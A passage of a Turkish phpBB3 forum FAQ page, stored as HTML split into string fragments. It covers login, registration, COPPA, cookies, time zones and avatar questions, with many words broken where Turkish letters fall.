            "nder butonuna bas\u0131nca neden oturum a",
            "mam isteniyor?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>G",
            "nderim Konular\u0131</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r0\">Bir forumda nas\u0131l ba\u015fl\u0131k a",
            "abilirim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r1\">Bir iletiyi nas\u0131l de\u011fi\u015ftirebilir veya silerim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r2\">\u0130letime imzam\u0131 nas\u0131l eklerim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r3\">Nas\u0131l anket olu\u015ftururum?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r4\">Neden daha fazla anket se",
            "ene\u011fi olu\u015fturam\u0131yorum?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r5\">Bir anketi nas\u0131l d",
            "zenleyebilir ya da silebilirim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r6\">Baz\u0131 forumlara neden eri\u015femiyorum?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r7\">Neden eklenti y",
            "kleyemiyorum?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r8\">Neden bir uyar\u0131 ald\u0131m?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r9\">\u0130letileri yetkililere nas\u0131l rapor ederim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r10\">Konu g",
            "nderimindeki \u201cKaydet\u201d butonu ne i",
            "in?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r11\">Neden iletimin onaylanmas\u0131 gerekiyor?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r12\">Konumu nas\u0131l g",
            "ncel tutabilirim?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>Bi",
            "imlendirme ve Ba\u015fl\u0131k Tipleri</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r0\">Bi",
            "im kodu nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r1\">HTML kullanabilir miyim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r2\">\u0130fadeler nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r3\">Resim g",
            "nderebilir miyim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r4\">Genel duyuru nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r5\">Duyuru nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r6\">Sabit konu nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r7\">Kilitli konu nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r8\">Konu ikonu nedir?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>Kullan\u0131c\u0131 Seviyeleri ve Gruplar</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r0\">Y",
            "netici nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r1\">Yetkili nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r2\">Kullan\u0131c\u0131 grubu nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r3\">Kullan\u0131c\u0131 gruplar\u0131 nerede ve bir gruba nas\u0131l kat\u0131l\u0131r\u0131m?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r4\">Nas\u0131l bir grup lideri olabilirim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r5\">Neden baz\u0131 gruplar farkl\u0131 renkte g",
            "yor?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r6\">\u201cVarsay\u0131lan Kullan\u0131c\u0131 Grubu\u201d nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r7\">\u201cY",
            "netim ekibi\u201d ba\u011f\u0131 nedir?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>",
            "zel Mesajla\u015fma</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f5r0\">",
            "zel mesaj g",
            "nderemiyorum!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f5r1\">\u0130stenmeyen ",
            "zel mesajlar almaya devam ediyorum!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f5r2\">Bu pano ",
            "yelerinden birinden istenmeyen ya da olumsuz i",
            "erikli e-posta al\u0131yorum!</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>Arkada\u015flar ve Yasakl\u0131lar</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f6r0\">Arkada\u015flar\u0131m ve yasakl\u0131lar listesi nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f6r1\">Arkada\u015flar\u0131m / yasakl\u0131lar listesine kullan\u0131c\u0131lar\u0131 nas\u0131l eklerim?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>Forumlarda Arama</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r0\">Bir forumda veya forumlarda nas\u0131l arama yapar\u0131m?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r1\">Neden \u201cSonu",
            " bulunamad\u0131\u201d hatas\u0131n\u0131 al\u0131yorum?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r2\">Neden arama sonucunda bo\u015f bir sayfaya d",
            "yorum!?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r3\">",
            "yeler i",
            "in nas\u0131l arar\u0131m?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r4\">Kendi iletilerimi ve konular\u0131m\u0131 nas\u0131l bulurum?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>Konu \u0130zlemeleri ve S\u0131k Kullan\u0131lanlar</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f8r0\">S\u0131k kullan\u0131lanlar ile konuya kaydolmak aras\u0131nda nas\u0131l bir fark vard\u0131r?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f8r1\">Belli bir forum ya da ba\u015fl\u0131\u011fa kaydolmak i",
            "in ne yapmal\u0131y\u0131m?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f8r2\">Aboneliklerimi nas\u0131l silebilirim?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>Eklentiler</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f9r0\">Bu panoda hangi eklentilere izin verilmekte?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f9r1\">Kendime ait t",
            "m eklentileri nas\u0131l bulabilirim?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>phpBB3 Konular\u0131</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r0\">Bu mesaj panosunu kim yazd\u0131?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r1\">Bu yaz\u0131l\u0131m\u0131 kim T",
            "e\u2019ye terc",
            "me etti?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r2\">Neden X ",
            "zelli\u011fi yok?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r3\">Bu panodaki hatal\u0131 kullan\u0131m ve/veya yasal konularla ilgili olarak kimle ileti\u015fim kurmal\u0131y\u0131m?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t</td>",
            "\t</tr>",
            "\t<tr>",
            "\t\t<td class=\"cat\">&nbsp;</td>",
            "\t</tr>",
            "\t</table>",
            "\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Oturum A",
            "ma ve Kay\u0131t Konular\u0131</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r0\"></a><b>&#187; Neden oturum a",
            "am\u0131yorum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bunun farkl\u0131 sebepleri olabilir. ",
            "ncelikle, kullan\u0131c\u0131 ad\u0131 ve parolan\u0131z\u0131n do\u011fru oldu\u011funa emin olun. E\u011fer do\u011fruysa, uzakla\u015ft\u0131r\u0131lmad\u0131\u011f\u0131n\u0131z\u0131 do\u011frulamak i",
            "in pano y",
            "neticisi ile irtibata ge",
            "in. Ayn\u0131 zamanda y",
            "netici d",
            "zeltilmesi gereken bir hata da yapm\u0131\u015f olabilir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r1\"></a><b>&#187; Neden ",
            "ye olmal\u0131y\u0131m?</b></div>",
            "\t\t\t\t<div class=\"postbody\">B",
            "yle bir zorunlulu\u011funuz olmayabilir. \u0130leti g",
            "nderebilmek i",
            "ye olman\u0131z\u0131n gerekip gerekmeyece\u011fi pano y",
            "neticisine ba\u011fl\u0131d\u0131r. Yine de ",
            "ye olmak, misafir ziyaret",
            "iler i",
            "in mevcut olmayan avatar belirleme, ",
            "zel mesaj, kullan\u0131c\u0131lar aras\u0131 e-posta, grup ",
            "yeli\u011fi gibi baz\u0131 ek ",
            "zellikleri kullan\u0131m\u0131n\u0131za sunacakt\u0131r. Kay\u0131t olman\u0131z ",
            "nerilir ve bu i\u015flem sadece birka",
            " dakika al\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r2\"></a><b>&#187; Neden oturumum otomatik olarak kapan\u0131yor?</b></div>",
            "\t\t\t\t<div class=\"postbody\">E\u011fer oturum a",
            "arken <em>Beni hat\u0131rla</em> kutusunu i\u015faretlemezseniz pano sizi sadece mevcut oturum boyunca ",
            "evirimi",
            "i olacak \u015fekilde tutacakt\u0131r. Bu hesab\u0131n\u0131z\u0131n ba\u015fka biri taraf\u0131ndan kullan\u0131lmas\u0131n\u0131 engeller. S",
            "rekli ba\u011fl\u0131 kalmak istiyorsan\u0131z kutuyu i\u015faretleyebilirsiniz. K",
            "phane, internet cafe, ",
            "niversite bilgisayar labaratuvar\u0131 gibi payla\u015f\u0131ma a",
            "\u0131k bilgisayarlarda bu \u015fekilde giri\u015f yapman\u0131z ",
            "nerilmez. E\u011fer kontrol kutusunu g",
            "remiyorsan\u0131z, bu pano y",
            "neticisinin bu ",
            "zelli\u011fi pasif hale getirdi\u011fi anlam\u0131na gelir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r3\"></a><b>&#187; Aktif ",
            "ye listesinde kullan\u0131c\u0131 ad\u0131m\u0131n g",
            "nmesini nas\u0131l engellerim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Kullan\u0131c\u0131 panelinizdeki \u201cPano se",
            "enekleri\u201d alt\u0131nda <em>",
            "evirimi",
            "i oldu\u011fumu gizle</em> se",
            "ene\u011fini g",
            "receksiniz. E\u011fer bu se",
            "ene\u011fi <samp>Evet</samp> olarak i\u015faretleyerek aktif hale getirirseniz, sadece pano y",
            "neticileri, yetkililer ve kendiniz taraf\u0131ndan g",
            "r hale geleceksiniz. Gizli ",
            "ye olacaks\u0131n\u0131z.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r4\"></a><b>&#187; Parolam\u0131 unuttum!</b></div>",
            "\t\t\t\t<div class=\"postbody\">Endi\u015felenmeyin! Parolan\u0131za ula\u015famaman\u0131z durumunda yeni bir parola olu\u015fturulabilir. Bu durumda oturum a",
            "ma sayfas\u0131na gidin ve <em>Parolam\u0131 unuttum</em> ba\u011flant\u0131s\u0131na t\u0131klay\u0131n, talimatlar\u0131 uygulay\u0131n ve zaman kaybetmeden tekrar ",
            "evirimi",
            "i olun.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r5\"></a><b>&#187; Kay\u0131t oldum ancak oturum a",
            "am\u0131yorum!</b></div>",
            "\t\t\t\t<div class=\"postbody\">",
            "ncelikle, do\u011fru kullan\u0131c\u0131 ad\u0131 ve parola girdi\u011finizden emin olun. E\u011fer do\u011fruysa iki nedenden oturum a",
            "am\u0131yor olabilirsiniz. E\u011fer COPPA deste\u011fi aktif hale getirilmi\u015fse ve kay\u0131t esnas\u0131nda 13 ya\u015f\u0131ndan k",
            "k oldu\u011funu ifade etmi\u015fseniz, size g",
            "nderilen y",
            "nergeyi takip edin. Baz\u0131 pano y",
            "neticileri ",
            "yelerin aktif olarak panoyu kullanmalar\u0131 i",
            "in kendilerinin ya da ",
            "yelerin kendi ",
            "yeliklerini aktif hale getirmesini zorunlu k\u0131lmaktad\u0131r; bu bilgi kay\u0131t a\u015famas\u0131nda size ifade edilmektedir. E\u011fer size bir e-posta geldiyse, e-postadaki talimatlar\u0131 takip edin. E\u011fer size bu e-posta ula\u015fmad\u0131ysa, yanl\u0131\u015f bir e-posta adresi vermi\u015f olabilir, e-posta bir istenmeyen posta filtresine tak\u0131lm\u0131\u015f olabilir. E\u011fer verdi\u011finiz e-postan\u0131n do\u011frulu\u011fundan eminseniz, y",
            "neticilerden birine ula\u015fmay\u0131 deneyin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r6\"></a><b>&#187; Daha ",
            "nce ",
            "ye oldu\u011fum halde neden oturum a",
            "am\u0131yorum?!</b></div>",
            "\t\t\t\t<div class=\"postbody\">Kay\u0131t a\u015famas\u0131nda verdi\u011finiz e-posta adresine g",
            "nderilen iletide mevcut bulunan kullan\u0131c\u0131 ad\u0131n\u0131z\u0131 ve parolan\u0131z\u0131 kontrol edin ve yeniden oturum a",
            "may\u0131 deneyin. Bir sebeplerden ",
            "neticilerden biri kullan\u0131c\u0131 ad\u0131n\u0131z\u0131 silmi\u015f ya da ",
            "yeli\u011finizi pasif hale getirmi\u015f olabilir. Bununla birlikte, bir ",
            "ok pano y",
            "neticisi veritaban\u0131n\u0131n a\u015f\u0131r\u0131 kullan\u0131m\u0131n\u0131 ",
            "nlemek i",
            "in uzun bir s",
            "re herhangi bir kat\u0131l\u0131m g",
            "stermeyen ",
            "yeleri belli aral\u0131klarla silmektedir. E\u011fer ikinci ihtimal s",
            "z konusu ise yeniden kay\u0131t olmay\u0131 ve daha aktif bir kat\u0131l\u0131m g",
            "stermeyi deneyin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r7\"></a><b>&#187; COPPA nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">COPPA, \"1998 ",
            "evirimi",
            "ocuk G",
            "venli\u011fi ve Korumas\u0131 Hareketi\", Birle\u015fik Devletlerin 13 ya\u015f\u0131ndan k",
            "ocuklar\u0131n bilgi toplamak i",
            "in ailelerinden yaz\u0131l\u0131 izin almalar\u0131n\u0131 gerektiren bir kanun ya da yasal varislerin bilgilendirilmesi ve 13 ya\u015f\u0131ndan k",
            "klerin ki\u015fisel bilgilerinin toplanmas\u0131na izin vermesi metodudur. E\u011fer kay\u0131t esnas\u0131nda bu durumun size uydu\u011fundan emin de\u011filseniz yard\u0131m i",
            "in yasal dan\u0131\u015fman\u0131n\u0131za ba\u015fvurabilirsiniz. Unutmay\u0131n ki; phpBB size yasal ",
            "neriler sa\u011flayamaz ve kay\u0131t anla\u015fmas\u0131ndaki kurallar d\u0131\u015f\u0131nda herhangi bir yasal ba\u011flant\u0131 noktas\u0131 belirtemez.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r8\"></a><b>&#187; Neden kay\u0131t olam\u0131yorum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Pano y",
            "neticisi IP adresinizi yasaklam\u0131\u015f olabilir veya kullan\u0131c\u0131 ad\u0131n\u0131z izinli olmayabilir. Yeni ziyaret",
            "i kayd\u0131 al\u0131m\u0131 da engellemi\u015f olabilir. Yard\u0131m i",
            "in pano y",
            "neticisine ba\u015fvurabilirisniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r9\"></a><b>&#187; \u201cT",
            "m pano ",
            "erezlerini sil\u201d ne yapar?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\u201cT",
            "m pano ",
            "erezlerini sil\u201d panoya ba\u011fl\u0131 kalman\u0131z\u0131 sa\u011flamak i",
            "in phpBB3 taraf\u0131ndan olu\u015fturulan b",
            "erezleri siler, ve ayn\u0131 zamanda e\u011fer pano y",
            "neticisi ayarlam\u0131\u015fsa izlerin okunmas\u0131 gibi fonksiyonlar sa\u011flar. E\u011fer oturum a",
            "ma esnas\u0131nda sorun ya\u015f\u0131yorsan\u0131z, b",
            "n pano ",
            "erezlerini silmeniz sorununuzun ",
            "ne yard\u0131mc\u0131 olabilir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Kullan\u0131c\u0131 Tercihleri ve Ayarlar\u0131</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r0\"></a><b>&#187; Ayarlar\u0131m\u0131 nas\u0131l de\u011fi\u015ftirebilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">E\u011fer kay\u0131tl\u0131ysan\u0131z b",
            "n ayarlar\u0131n\u0131z veri taban\u0131nda tutulur. Ayarlar\u0131n\u0131z\u0131 de\u011fi\u015ftirmek i",
            "in, Kullan\u0131c\u0131 Kontrol Panelinize girin; pano sayfalar\u0131n\u0131n hepsinin ",
            "st k\u0131sm\u0131nda bulunan bir ba\u011flat\u0131d\u0131r. Bu sistem b",
            "n tercih ve ayarlar\u0131n\u0131z\u0131 de\u011fi\u015ftirmenizi sa\u011flayacakt\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r1\"></a><b>&#187; Zamanlar do\u011fru de\u011fil!</b></div>",
            "\t\t\t\t<div class=\"postbody\">Panonun zaman dilimi sizinkinden farkl\u0131 olabilir. E\u011fer durumunuz buna uyuyorsa kullan\u0131c\u0131 panelinize gidin, hesab\u0131n\u0131zdaki zaman dilimini Londra, Paris, New York, Sidney gibi ",
            "zel bir alanla de\u011fi\u015ftirin. Unutmay\u0131n ki zaman dilimini de\u011fi\u015ftirmeniz di\u011fer ayarlarda oldu\u011fu gibi kay\u0131tl\u0131 ",
            "ye olman\u0131za ba\u011fl\u0131d\u0131r. E\u011fer kay\u0131tl\u0131 ",
            "ye de\u011filseniz bu kaydolmak iyi bir zaman olabilir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r2\"></a><b>&#187; Zaman dilimini de\u011fi\u015ftirmeme ra\u011fmen zaman hala yanl\u0131\u015f!</b></div>",
            "\t\t\t\t<div class=\"postbody\">E\u011fer zaman dilimi ve Yaz Saati uygulamas\u0131n\u0131 (DST) do\u011fru yapt\u0131\u011f\u0131n\u0131zdan eminseniz ve zaman hala yanl\u0131\u015fsa, bunun sebebi sunucu saat\u0131n\u0131n yanl\u0131\u015f olmas\u0131d\u0131r. L",
            "tfen, y",
            "neticiyi problemin d",
            "zeltilmesi i",
            "in durumdan haberdar edin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r3\"></a><b>&#187; Listede benim dilim mevcut de\u011fil!</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bunun muhtemel sebepleri y",
            "neticinin sizin dilinizi y",
            "klememi\u015f olmas\u0131 ya da kimsenin bu pononun sizin dilinize hen",
            "z terc",
            "mesini yapmam\u0131\u015f olmas\u0131 olabilir. L",
            "tfen, y",
            "neticiye sizin dilinizin y",
            " olup olmad\u0131\u011f\u0131n\u0131 sorun. E\u011fer dil paketi yoksa terc",
            "me yapma ",
            "z vard\u0131r. Daha fazla bilgi i",
            "in phpBB Grubunun web sitesini ziyaret edebilirisiniz (sayfa alt\u0131ndaki ba\u011flant\u0131ya bak\u0131n\u0131z).</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r4\"></a><b>&#187; Kullan\u0131c\u0131 ad\u0131m\u0131n alt\u0131nda nas\u0131l resim g",
            "sterebilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\u0130letilere bakarken kullan\u0131c\u0131 ad\u0131n\u0131z\u0131n alt\u0131nda iki resim olabilir. Kullan\u0131lan stile ba\u011f\u0131l\u0131 olarak, birinci resim sizin seviyeniz ile ilgilidir, genel olarak y\u0131ld\u0131zlardan ya da sizin ne kadar ileti g",
            "nderdi\u011finizi ya da forumdaki stat",
            "steren bir blok olabilir. A\u015fa\u011f\u0131s\u0131nda avatar diye bilinen daha geni\u015f bir resim olabilir, bu genel olarak kullan\u0131c\u0131ya ",
            "zeldir. Avatar kullan\u0131m\u0131n\u0131 aktif hale getirmek pano y",
            "neticisine ba\u011fl\u0131d\u0131r ve nas\u0131l bir avatar\u0131n g",
            "sterilebilece\u011fi konusunda se",
            "im yapma hakk\u0131na sahiptirler. E\u011fer avatar kullanam\u0131yorsan\u0131z bu pano y",
